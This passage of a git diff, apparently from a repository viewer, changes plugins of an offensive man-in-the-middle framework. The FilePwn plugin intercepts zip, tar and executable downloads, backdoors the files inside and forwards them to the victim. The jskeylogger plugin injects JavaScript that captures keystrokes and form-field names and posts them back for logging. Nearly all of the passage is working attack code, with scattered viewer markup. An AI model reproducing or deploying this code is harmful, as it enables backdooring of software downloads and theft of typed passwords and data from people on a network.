print '[!] Not a tar file'
|
||||||
|
return aTarFileBytes
|
||||||
|
|
||||||
|
compressionMode = ':'
|
||||||
|
if formatt == 'gz':
|
||||||
|
compressionMode = ':gz'
|
||||||
|
if formatt == 'bz':
|
||||||
|
compressionMode = ':bz2'
|
||||||
|
|
||||||
|
tarFile = None
|
||||||
|
try:
|
||||||
|
tarFileStorage.seek(0)
|
||||||
|
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
|
||||||
|
except tarfile.ReadError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
if tarFile is None:
|
||||||
|
print '[!] Not a tar file'
|
||||||
|
return aTarFileBytes
|
||||||
|
|
||||||
|
print '[*] Tar file contents and info:'
|
||||||
|
print '[*] Compression:', formatt
|
||||||
|
|
||||||
|
members = tarFile.getmembers()
|
||||||
|
for info in members:
|
||||||
|
print "\t", info.name, info.mtime, info.size
|
||||||
|
|
||||||
|
newTarFileStorage = tempfile.NamedTemporaryFile()
|
||||||
|
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
|
||||||
|
|
||||||
|
patchCount = 0
|
||||||
|
wasPatched = False
|
||||||
|
|
||||||
|
for info in members:
|
||||||
|
print "[*] >>> Next file in tarfile:", info.name
|
||||||
|
|
||||||
|
if not info.isfile():
|
||||||
|
print info.name, 'is not a file'
|
||||||
|
newTarFile.addfile(info, tarFile.extractfile(info))
|
||||||
|
continue
|
||||||
|
|
||||||
|
if info.size >= long(self.FileSizeMax):
|
||||||
|
print info.name, 'is too big'
|
||||||
|
newTarFile.addfile(info, tarFile.extractfile(info))
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Check against keywords
|
||||||
|
keywordCheck = False
|
||||||
|
|
||||||
|
if type(self.tarblacklist) is str:
|
||||||
|
if self.tarblacklist.lower() in info.name.lower():
|
||||||
|
keywordCheck = True
|
||||||
|
|
||||||
|
else:
|
||||||
|
for keyword in self.tarblacklist:
|
||||||
|
if keyword.lower() in info.name.lower():
|
||||||
|
keywordCheck = True
|
||||||
|
continue
|
||||||
|
|
||||||
|
if keywordCheck is True:
|
||||||
|
print "[!] Tar blacklist enforced!"
|
||||||
|
logging.info('Tar blacklist enforced on %s', info.name)
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Try to patch
|
||||||
|
extractedFile = tarFile.extractfile(info)
|
||||||
|
|
||||||
|
if patchCount >= int(self.userConfig['TAR']['patchCount']):
|
||||||
|
newTarFile.addfile(info, extractedFile)
|
||||||
|
else:
|
||||||
|
# create the file on disk temporarily for fileGrinder to run on it
|
||||||
|
with tempfile.NamedTemporaryFile() as tmp:
|
||||||
|
shutil.copyfileobj(extractedFile, tmp)
|
||||||
|
tmp.flush()
|
||||||
|
patchResult = self.binaryGrinder(tmp.name)
|
||||||
|
if patchResult:
|
||||||
|
patchCount += 1
|
||||||
|
file2 = "backdoored/" + os.path.basename(tmp.name)
|
||||||
|
print "[*] Patching complete, adding to tar file."
|
||||||
|
info.size = os.stat(file2).st_size
|
||||||
|
with open(file2, 'rb') as f:
|
||||||
|
newTarFile.addfile(info, f)
|
||||||
|
logging.info("%s in tar patched, adding to tarfile", info.name)
|
||||||
|
os.remove(file2)
|
||||||
|
wasPatched = True
|
||||||
|
else:
|
||||||
|
print "[!] Patching failed"
|
||||||
|
with open(tmp.name, 'rb') as f:
|
||||||
|
newTarFile.addfile(info, f)
|
||||||
|
logging.info("%s patching failed. Keeping original file in tar.", info.name)
|
||||||
|
if patchCount == int(self.userConfig['TAR']['patchCount']):
|
||||||
|
logging.info("Met Tar config patchCount limit.")
|
||||||
|
|
||||||
|
# finalize the writing of the tar file first
|
||||||
|
newTarFile.close()
|
||||||
|
|
||||||
|
# then read the new tar file into memory
|
||||||
|
newTarFileStorage.seek(0)
|
||||||
|
ret = newTarFileStorage.read()
|
||||||
|
newTarFileStorage.close() # it's automatically deleted
|
||||||
|
|
||||||
|
if wasPatched is False:
|
||||||
|
# If nothing was changed return the original
|
||||||
|
print "[*] No files were patched forwarding original file"
|
||||||
|
return aTarFileBytes
|
||||||
|
else:
|
||||||
|
return ret
|
||||||
|
|
||||||
|
def zip_files(self, aZipFile):
|
||||||
"When called will unpack and edit a Zip File and return a zip file"
|
"When called will unpack and edit a Zip File and return a zip file"
|
||||||
|
|
||||||
logging.info("ZipFile size: %s KB" % (len(aZipFile) / 1024))
|
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
|
||||||
|
|
||||||
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
||||||
logging.info("ZipFIle maxSize met %s" % len(aZipFile))
|
print "[!] ZipFile over allowed size"
|
||||||
|
logging.info("ZipFIle maxSize met %s", len(aZipFile))
|
||||||
return aZipFile
|
return aZipFile
|
||||||
|
|
||||||
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
||||||
|
@ -187,21 +426,24 @@ class FilePwn(Plugin):
|
||||||
logging.info('Encrypted zipfile found. Not patching.')
|
logging.info('Encrypted zipfile found. Not patching.')
|
||||||
return aZipFile
|
return aZipFile
|
||||||
|
|
||||||
logging.info("ZipFile contents and info:")
|
print "[*] ZipFile contents and info:"
|
||||||
|
|
||||||
for info in zippyfile.infolist():
|
for info in zippyfile.infolist():
|
||||||
logging.info("\t%s %s %s" % (info.filename, info.date_time, info.file_size))
|
print "\t", info.filename, info.date_time, info.file_size
|
||||||
|
|
||||||
zippyfile.extractall(tmpDir)
|
zippyfile.extractall(tmpDir)
|
||||||
|
|
||||||
patchCount = 0
|
patchCount = 0
|
||||||
|
|
||||||
|
wasPatched = False
|
||||||
|
|
||||||
for info in zippyfile.infolist():
|
for info in zippyfile.infolist():
|
||||||
logging.info(">>> Next file in zipfile: %s" % info.filename)
|
print "[*] >>> Next file in zipfile:", info.filename
|
||||||
|
|
||||||
if os.path.isdir(tmpDir + '/' + info.filename) is True:
|
if os.path.isdir(tmpDir + '/' + info.filename) is True:
|
||||||
logging.info('%s is a directory' % info.filename)
|
print info.filename, 'is a directory'
|
||||||
continue
|
continue
|
||||||
|
|
||||||
#Check against keywords
|
#Check against keywords
|
||||||
keywordCheck = False
|
keywordCheck = False
|
||||||
|
|
||||||
|
@ -216,7 +458,8 @@ class FilePwn(Plugin):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if keywordCheck is True:
|
if keywordCheck is True:
|
||||||
logging.info('Zip blacklist enforced on %s' % info.filename)
|
print "[!] Zip blacklist enforced!"
|
||||||
|
logging.info('Zip blacklist enforced on %s', info.filename)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
||||||
|
@ -224,12 +467,16 @@ class FilePwn(Plugin):
|
||||||
if patchResult:
|
if patchResult:
|
||||||
patchCount += 1
|
patchCount += 1
|
||||||
file2 = "backdoored/" + os.path.basename(info.filename)
|
file2 = "backdoored/" + os.path.basename(info.filename)
|
||||||
|
print "[*] Patching complete, adding to zip file."
|
||||||
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
||||||
logging.info("%s in zip patched, adding to zipfile" % info.filename)
|
logging.info("%s in zip patched, adding to zipfile", info.filename)
|
||||||
|
os.remove(file2)
|
||||||
|
wasPatched = True
|
||||||
else:
|
else:
|
||||||
logging.info("%s patching failed. Keeping original file in zip." % info.filename)
|
print "[!] Patching failed"
|
||||||
|
logging.info("%s patching failed. Keeping original file in zip.", info.filename)
|
||||||
|
|
||||||
|
print '-' * 10
|
||||||
|
|
||||||
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
|
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
|
||||||
logging.info("Met Zip config patchCount limit.")
|
logging.info("Met Zip config patchCount limit.")
|
||||||
|
@ -239,12 +486,12 @@ class FilePwn(Plugin):
|
||||||
|
|
||||||
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
|
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
|
||||||
|
|
||||||
logging.debug("Writing to zipfile: %s" % tmpFile)
|
print "[*] Writing to zipfile:", tmpFile
|
||||||
|
|
||||||
for base, dirs, files in os.walk(tmpDir):
|
for base, dirs, files in os.walk(tmpDir):
|
||||||
for afile in files:
|
for afile in files:
|
||||||
filename = os.path.join(base, afile)
|
filename = os.path.join(base, afile)
|
||||||
logging.debug('[*] Writing filename to zipfile: %s' % filename.replace(tmpDir + '/', ''))
|
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
|
||||||
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
|
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
|
||||||
|
|
||||||
zipResult.close()
|
zipResult.close()
|
||||||
|
@ -252,36 +499,55 @@ class FilePwn(Plugin):
|
||||||
shutil.rmtree(tmpDir)
|
shutil.rmtree(tmpDir)
|
||||||
|
|
||||||
with open(tmpFile, 'rb') as f:
|
with open(tmpFile, 'rb') as f:
|
||||||
aZipFile = f.read()
|
tempZipFile = f.read()
|
||||||
os.remove(tmpFile)
|
os.remove(tmpFile)
|
||||||
|
|
||||||
return aZipFile
|
if wasPatched is False:
|
||||||
|
print "[*] No files were patched forwarding original file"
|
||||||
|
return aZipFile
|
||||||
|
else:
|
||||||
|
return tempZipFile
|
||||||
|
|
||||||
def handleResponse(self, request, data):
|
def handleResponse(self, request, data):
|
||||||
|
|
||||||
content_header = request.client.headers['Content-Type']
|
content_header = request.client.headers['Content-Type']
|
||||||
|
client_ip = request.client.getClientIP()
|
||||||
|
|
||||||
if content_header in self.zipMimeTypes:
|
if content_header in self.zipMimeTypes:
|
||||||
logging.info("%s Detected supported zip file type!" % request.client.getClientIP())
|
|
||||||
bd_zip = self.zipGrinder(data)
|
if self.bytes_have_format(data, 'zip'):
|
||||||
if bd_zip:
|
logging.info("%s Detected supported zip file type!" % client_ip)
|
||||||
logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
|
bd_zip = self.zip_files(data)
|
||||||
return {'request': request, 'data': bd_zip}
|
if bd_zip:
|
||||||
|
logging.info("%s Patching complete, forwarding to client" % client_ip)
|
||||||
|
return {'request': request, 'data': bd_zip}
|
||||||
|
|
||||||
|
else:
|
||||||
|
for tartype in ['gz','bz','tar']:
|
||||||
|
if self.bytes_have_format(data, tartype):
|
||||||
|
logging.info("%s Detected supported tar file type!" % client_ip)
|
||||||
|
bd_tar = self.tar_files(data)
|
||||||
|
if bd_tar:
|
||||||
|
logging.info("%s Patching complete, forwarding to client" % client_ip)
|
||||||
|
return {'request': request, 'data': bd_tar}
|
||||||
|
|
||||||
|
|
||||||
elif content_header in self.binaryMimeTypes:
|
elif content_header in self.binaryMimeTypes:
|
||||||
logging.info("%s Detected supported binary type!" % request.client.getClientIP())
|
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
||||||
fd, tmpFile = mkstemp()
|
if self.bytes_have_format(data, bintype):
|
||||||
with open(tmpFile, 'w') as f:
|
logging.info("%s Detected supported binary type!" % client_ip)
|
||||||
f.write(data)
|
fd, tmpFile = mkstemp()
|
||||||
|
with open(tmpFile, 'w') as f:
|
||||||
patchb = self.binaryGrinder(tmpFile)
|
f.write(data)
|
||||||
|
|
||||||
if patchb:
|
patchb = self.binaryGrinder(tmpFile)
|
||||||
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
|
||||||
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
if patchb:
|
||||||
logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
|
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
||||||
return {'request': request, 'data': bd_binary}
|
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
||||||
|
logging.info("%s Patching complete, forwarding to client" % client_ip)
|
||||||
|
return {'request': request, 'data': bd_binary}
|
||||||
|
|
||||||
else:
|
else:
|
||||||
logging.debug("%s File is not of supported Content-Type: %s" % (request.client.getClientIP(), content_header))
|
logging.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
|
||||||
return {'request': request, 'data': data}
|
return {'request': request, 'data': data}
|
|
@ -2,7 +2,6 @@ from plugins.plugin import Plugin
|
||||||
from plugins.Inject import Inject
|
from plugins.Inject import Inject
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
|
|
||||||
class jskeylogger(Inject, Plugin):
|
class jskeylogger(Inject, Plugin):
|
||||||
name = "Javascript Keylogger"
|
name = "Javascript Keylogger"
|
||||||
optname = "jskeylogger"
|
optname = "jskeylogger"
|
||||||
|
@ -13,14 +12,19 @@ class jskeylogger(Inject, Plugin):
|
||||||
def initialize(self, options):
|
def initialize(self, options):
|
||||||
Inject.initialize(self, options)
|
Inject.initialize(self, options)
|
||||||
self.html_payload = self.msf_keylogger()
|
self.html_payload = self.msf_keylogger()
|
||||||
|
|
||||||
print "[*] Javascript Keylogger plugin online"
|
print "[*] Javascript Keylogger plugin online"
|
||||||
|
|
||||||
def sendPostData(self, request):
|
def sendPostData(self, request):
|
||||||
#Handle the plugin output
|
#Handle the plugin output
|
||||||
if 'keylog' in request.uri:
|
if 'keylog' in request.uri:
|
||||||
keys = request.postData.split(",")
|
|
||||||
|
raw_keys = request.postData.split("&&")[0]
|
||||||
|
keys = raw_keys.split(",")
|
||||||
del keys[0]; del(keys[len(keys)-1])
|
del keys[0]; del(keys[len(keys)-1])
|
||||||
|
|
||||||
|
input_field = request.postData.split("&&")[1]
|
||||||
|
|
||||||
nice = ''
|
nice = ''
|
||||||
for n in keys:
|
for n in keys:
|
||||||
if n == '9':
|
if n == '9':
|
||||||
|
@ -33,9 +37,14 @@ class jskeylogger(Inject, Plugin):
|
||||||
try:
|
try:
|
||||||
nice += n.decode('hex')
|
nice += n.decode('hex')
|
||||||
except:
|
except:
|
||||||
logging.warning("%s ERROR decoding char %s" % (request.client.getClientIP(), n))
|
logging.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
|
||||||
|
|
||||||
logging.warning("%s [%s] Keys: %s" % (request.client.getClientIP(), request.headers['host'], nice))
|
#try:
|
||||||
|
# input_field = input_field.decode('hex')
|
||||||
|
#except:
|
||||||
|
# logging.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))
|
||||||
|
|
||||||
|
logging.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
|
||||||
|
|
||||||
def msf_keylogger(self):
|
def msf_keylogger(self):
|
||||||
#Stolen from the Metasploit module http_javascript_keylogger
|
#Stolen from the Metasploit module http_javascript_keylogger
|
||||||
|
@ -43,7 +52,7 @@ class jskeylogger(Inject, Plugin):
|
||||||
payload = """<script type="text/javascript">
|
payload = """<script type="text/javascript">
|
||||||
window.onload = function mainfunc(){
|
window.onload = function mainfunc(){
|
||||||
var2 = ",";
|
var2 = ",";
|
||||||
|
name = '';
|
||||||
function make_xhr(){
|
function make_xhr(){
|
||||||
var xhr;
|
var xhr;
|
||||||
try {
|
try {
|
||||||
|
@ -80,30 +89,59 @@ document.onkeydown = function1;
|
||||||
}
|
}
|
||||||
|
|
||||||
}
|
}
|
||||||
function function2(e){
|
|
||||||
var3 = (window.event) ? window.event.keyCode : e.which;
|
function function2(e)
|
||||||
var3 = var3.toString(16);
|
{
|
||||||
if (var3 != "d"){
|
srcname = window.event.srcElement.name;
|
||||||
function3(var3);
|
var3 = (window.event) ? window.event.keyCode : e.which;
|
||||||
}
|
var3 = var3.toString(16);
|
||||||
}
|
|
||||||
function function1(e){
|
if (var3 != "d")
|
||||||
var3 = (window.event) ? window.event.keyCode : e.which;
|
{
|
||||||
if (var3 == 9 || var3 == 8 || var3 == 13){
|
andxhr(var3, srcname);
|
||||||
function3(var3);
|
}
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
function function3(var3){
|
function function1(e)
|
||||||
var2 = var2 + var3 + ",";
|
{
|
||||||
|
srcname = window.event.srcElement.name;
|
||||||
|
id = window.event.srcElement.id;
|
||||||
|
|
||||||
xhr.open("POST", "keylog", true);
|
var3 = (window.event) ? window.event.keyCode : e.which;
|
||||||
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
|
if (var3 == 9 || var3 == 8 || var3 == 13)
|
||||||
xhr.send(var2);
|
{
|
||||||
|
andxhr(var3, srcname);
|
||||||
|
}
|
||||||
|
else if (var3 == 0)
|
||||||
|
{
|
||||||
|
|
||||||
|
text = document.getElementById(id).value;
|
||||||
|
if (text.length != 0)
|
||||||
|
{
|
||||||
|
andxhr(text.toString(16), srcname);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
if (var3 == 13 || var2.length > 3000)
|
function andxhr(key, inputName)
|
||||||
var2 = ",";
|
{
|
||||||
|
if (inputName != name)
|
||||||
|
{
|
||||||
|
name = inputName;
|
||||||
|
var2 = ",";
|
||||||
|
}
|
||||||
|
|
||||||
|
var2= var2 + key + ",";
|
||||||
|
|
||||||
|
xhr.open("POST", "keylog", true);
|
||||||
|
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
|
||||||
|
xhr.send(var2 + '&&' + inputName);
|
||||||
|
|
||||||
|
if (key == 13 || var2.length > 3000)
|
||||||
|
{
|
||||||
|
var2 = ",";
|
||||||
|
}
|
||||||
}
|
}
|
||||||
</script>"""
|
</script>"""
|
||||||
|
|
||||||
return payload
|
return payload
|
|
@ -20,11 +20,7 @@ from base64 import b64decode
|
||||||
from urllib import unquote
|
from urllib import unquote
|
||||||
import binascii
|
import binascii
|
||||||
import random
|
import random
|
||||||
|
from configobj import ConfigObj
|
||||||
try:
|
|
||||||
from configobj import ConfigObj
|
|
||||||
except:
|
|
||||||
sys.exit('[-] configobj library not installed!')
|
|
||||||
|
|
||||||
|
|
||||||
class Spoof(Plugin):
|
class Spoof(Plugin):
|
||||||
|
|
1
setup.sh
1
setup.sh
|
@ -6,6 +6,7 @@ fi
|
||||||
|
|
||||||
apt-get install python-scapy python-dns python-pip msgpack-python python-nfqueue python-imaging -y
|
apt-get install python-scapy python-dns python-pip msgpack-python python-nfqueue python-imaging -y
|
||||||
apt-get install python-twisted-web python-dnspython python-requests python-configobj python-pefile -y
|
apt-get install python-twisted-web python-dnspython python-requests python-configobj python-pefile -y
|
||||||
|
pip install pyyaml ua-parser user-agents
|
||||||
git submodule init
|
git submodule init
|
||||||
git submodule update
|
git submodule update
|
||||||
cd libs/bdfactory/ && ./install.sh
|
cd libs/bdfactory/ && ./install.sh
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue